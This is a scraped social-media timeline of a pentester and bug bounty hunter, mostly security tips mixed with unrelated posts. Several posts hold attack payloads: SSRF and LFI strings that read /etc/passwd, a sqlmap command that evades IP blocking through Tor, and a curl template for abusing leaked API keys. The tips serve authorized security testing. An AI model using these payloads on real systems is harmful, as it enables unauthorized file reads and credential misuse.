Osama Sadoqi 🇲🇦
@Osaqii
Pentester , BugBounty Hunter , Network Administrator
Joined July 2013
A tradition dating back 180 years.. Why do Americans elect their presidents on the first Tuesday of November? #AlGhad_Channel #Trump #Biden #America #Harris #US_Elections
We just released a post on certifications: "The Certification Trap" Make sure you check it out! https://t.co/mUKiyCozNV
pentesterlab.com
Explore the pitfalls of relying on certifications in security, and why real skills, critical thinking, and personalized growth should take priority over collecting badges.
First SQL injection on BMW program.. thank you @GodfatherOrwa for the motivation, you're the man. +Tip: dorking is the key to finding juicy endpoints #bugbountytip #bugbounty
Another P1 using @GodfatherOrwa tip:
- Found default IIS BLUE page
- Run tool shortscan for iis
- Found endpoint like : target~.zip
- run fuzz and found zip file with a web.config file leaking creds. Leads to Admin dashboard takeover.
#bugbountytip
Been preparing for the OSCP using Notion to track my progress, and wanted to share this template if anyone needs it, feel free to DM me #OSCP #Offensivesecurity #BugBounty #offsec
Today a weird endpoint was found doing recursive fuzzing with ffuf: /css/trace.axd --> leaking users' sessions #bugbountytips
Does gittools extractor still work for you for extracting .git files? @GodfatherOrwa #bugbountytip #bugbounty
Strong aftershock activity may occur in/near #Morocco. Pay attention! #earthquake.
SSRF Payloads for LFR/LFD
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
SSRF POLYGLOT
file:///etc/passwd?/../passwd
by @brutelogic #infosec #cybersec
The last secret keys I found lately impact & exploitation
Algolia:
curl -X GET \
  -H "X-Algolia-API-Key: KEY" \
  -H "X-Algolia-Application-Id: APPID" \
  "https://t.co/Bhd75ErikN"
#BugBounty #bugbountytips #Bugcrowd 👇👇
I finally got ffuf to output to a text file in a decent way for automation: ffuf -w /tmp/wordlists.txt -u URL/FUZZ -r -ac -v &>> /tmp/output.txt ; sed -i 's/\:\: Progress.*Errors.*\:\://g' /tmp/output.txt ; sed -i 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' /tmp/output.txt #bugbountytips
LFI Trick: /fileRead.jsp?fileName=/etc/passwd (406📛) /fileRead.jsp?fileName=/?tc/?asswd (200✅) /fileRead.jsp?fileName=/??c/??sswd (200✅) #infosec #bugbountytips #BugBounty
Bypass IP blocking in sqlmap: I found SQL injection, and in a normal scan my IP was blocked. I used Tor to send a request and I bypassed this issue: sqlmap -r 1 --time-sec=10 --tor --tor-type=SOCKS5 --check-tor If it does not work, change time-sec or use a proxy list #bugbounty #bugbountytips
Here I found a P1: - “_wpeprivate” check this directory. Here, lots of sensitive data 😅 - “_wpeprivate” ——-> 302 #bugbounty #bug #bugbountytips
After saving the links, we now need to filter the extracted results and keep only the JavaScript files, using the following command: cat test.txt| grep -aEo 'https?://[^ ]+' | sed 's/]$//' | sort -u| grep -aEi "\.(js)" The first command reads the file, then the links are collected and filtered by file extension
Sharing a blog post containing some of my collaborative work around exploiting WordPress Plugin 0/N-days across multiple programs to score some nice bounties - https://t.co/0nCWYdUda1
#BugBounty #Security
Always cool seeing new tools from @pdiscoveryio
https://t.co/L3ocBG3iij
projectdiscovery.io
If you're into hacking, there's a good chance that at least one of ProjectDiscovery's tools has been added to your toolbox over the last couple of years. In all honesty, ProjectDiscovery's tools now...
Shopify disclosed a bug submitted by 0x50d: https://t.co/cS1JXPZZWA - Bounty: $2,900 #hackerone #bugbounty
Just created a really basic Go tool that goes through a list of subdomains and tells you which ones resolve to internal IPv4 addresses. Useful for escalating SSRF vulns. https://t.co/BPuFvq1M5j
github.com
Feed it a list of subdomains, it will resolve them and tell you which ones are internal - hakluke/hakfindinternaldomains